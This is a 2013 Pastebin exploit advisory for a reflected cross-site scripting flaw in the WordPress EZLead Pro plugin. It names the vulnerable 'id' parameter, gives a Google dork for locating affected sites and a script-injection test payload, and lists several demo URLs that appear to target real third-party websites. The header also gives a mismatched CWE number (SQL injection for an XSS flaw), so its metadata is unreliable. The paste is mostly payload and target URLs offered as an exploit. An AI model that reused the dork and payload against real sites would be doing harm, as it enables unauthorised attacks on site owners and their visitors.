Advertisement
AndrewHaxalot

Wordpress EZLead Pro Plugin XSS

Dec 23rd, 2013
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.24 KB | None | 0 0
  1. ####################
  2. # Exploit Title : Wordpress WP EZLead Pro plugin Cross site scripting
  3. # Exploit Author : Ashiyane Digital Security Team
  4. # Vendor Homepage : http://alain-daniel.com/produits_recommandes/ezleadpro
  5. # Google Dork : inurl:wp-content/plugins/ezleadpro
  6. # Date: 2013-12-22
  7. # Remote : Yes
  8. # Risk : Low
  9. # CWE : CWE-89
  10. # Tested on: Windows 7 & Linux
  11. # Discovered by : ACC3SS
  12. ------------------------------------------------
  13. #
  14. # Exploit : Cross site scripting
  15. #
  16. # Location : localhost/wp-content/plugins/ezleadpro/lp/index.php?id=[xss]
  17. #
  18. # Method : Get
  19. #
  20. # Script For Test : "/><script>alert(1);</script>
  21. #
  22. ------------------------------------------------
  23. #
  24. # Demo:
  25. #
  26. # http://busiXneslife.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
  27. #
  28. #
  29. http://innoXvativeinfomarketing.com/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</
  30. script>
  31. #
  32. # http://korXotkovv.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
  33. #
  34. #
  35. http://poXstoiannidohod.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
  36. ;
  37. #
  38. #
  39. http://zXhannamitina.com/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
  40. #
  41. ######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement